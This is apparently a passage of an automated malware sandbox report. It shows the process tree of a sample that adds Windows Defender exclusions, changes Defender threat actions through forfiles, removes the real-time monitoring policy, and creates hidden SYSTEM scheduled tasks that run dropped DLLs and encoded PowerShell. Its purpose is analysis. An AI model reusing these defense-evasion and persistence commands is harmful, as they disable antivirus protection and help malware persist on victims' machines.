                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:748
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2248
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2488
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2292
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:596
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2256
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2428
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:860
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2376
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:2608
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1788
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2380
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:2592
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:2216
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2312
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                                PID:2184
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:1576
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1160
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2900
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2868
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:2812
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:2912
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "gEFRKurQb" /SC once /ST 06:57:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                    3⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:920
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "gEFRKurQb"
                                                                                    3⤵
                                                                                      PID:2220
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "gEFRKurQb"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1552
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2352
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                        4⤵
                                                                                          PID:1812
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                        3⤵
                                                                                          PID:2340
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1972
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "tgKluuvSNQRGAHQwW" /SC once /ST 19:42:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe\" fN /LxIGdidHU 525403 /S" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1728
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "tgKluuvSNQRGAHQwW"
                                                                                          3⤵
                                                                                            PID:2196
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 680
                                                                                            3⤵
                                                                                            • Loads dropped DLL
                                                                                            • Program crash
                                                                                            PID:1672
                                                                                        • C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe
                                                                                          C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe fN /LxIGdidHU 525403 /S
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Drops Chrome extension
                                                                                          • Drops file in System32 directory
                                                                                          • Drops file in Program Files directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1620
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                              PID:1616
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2416
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2304
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                    6⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:836
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:900
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2636
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                    6⤵
                                                                                                      PID:2112
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1864
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2152
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1740
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:1880
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    5⤵
                                                                                                      PID:2268
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:748
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                    4⤵
                                                                                                    • Indirect Command Execution
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2616
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2612
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:928
                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          7⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1736
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bQeBRIfYCApeQZGKek"
                                                                                                  3⤵
                                                                                                    PID:2164
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2288
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                      4⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:2420
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        5⤵
                                                                                                          PID:2376
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            6⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:820
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                              7⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2176
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                        4⤵
                                                                                                        • Indirect Command Execution
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1692
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          5⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1652
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            6⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2772
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                              7⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2880
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OmYhQlgyU\AvBchx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jYxDgykbLQIqEEE" /V1 /F
                                                                                                      3⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2736
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "jYxDgykbLQIqEEE2" /F /xml "C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:824
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /END /TN "jYxDgykbLQIqEEE"
                                                                                                      3⤵
                                                                                                        PID:2268
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "jYxDgykbLQIqEEE"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1300
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "OibvKUbCFWAeNZ" /F /xml "C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:928
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "SgTldWdJyDXUX2" /F /xml "C:\ProgramData\eZNCfusnXmtZMmVB\qmhQqLJ.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1616
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "wmWRqWhgZsXCMPdXZ2" /F /xml "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1100
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "RJVImfMUYoaVBdYkcUO2" /F /xml "C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1872
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "POGTAxIfkFSBYDVsP" /SC once /ST 00:21:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll\",#1 /IErdida 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2600
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "POGTAxIfkFSBYDVsP"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1572
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "tgKluuvSNQRGAHQwW"
                                                                                                        3⤵
                                                                                                          PID:2700
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 1572
                                                                                                          3⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Program crash
                                                                                                          PID:2156
                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 525403
                                                                                                        2⤵
                                                                                                          PID:1268
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 525403
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in System32 directory
                                                                                                            • Enumerates system info in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2712
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "POGTAxIfkFSBYDVsP"
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2708
                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                        taskeng.exe {13A2C9A9-E344-49CB-9AC9-377B3577710F} S-1-5-21-2257386474-3982792636-3902186748-1000:CTBHAMHL\Admin:Interactive:[1]
                                                                                                        1⤵
                                                                                                          PID:968
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:340
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:1508
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1652
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2868
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:660
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1588
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:1592
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2320
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:3028
                                                                                                                    • C:\Windows\system32\conhost.exe
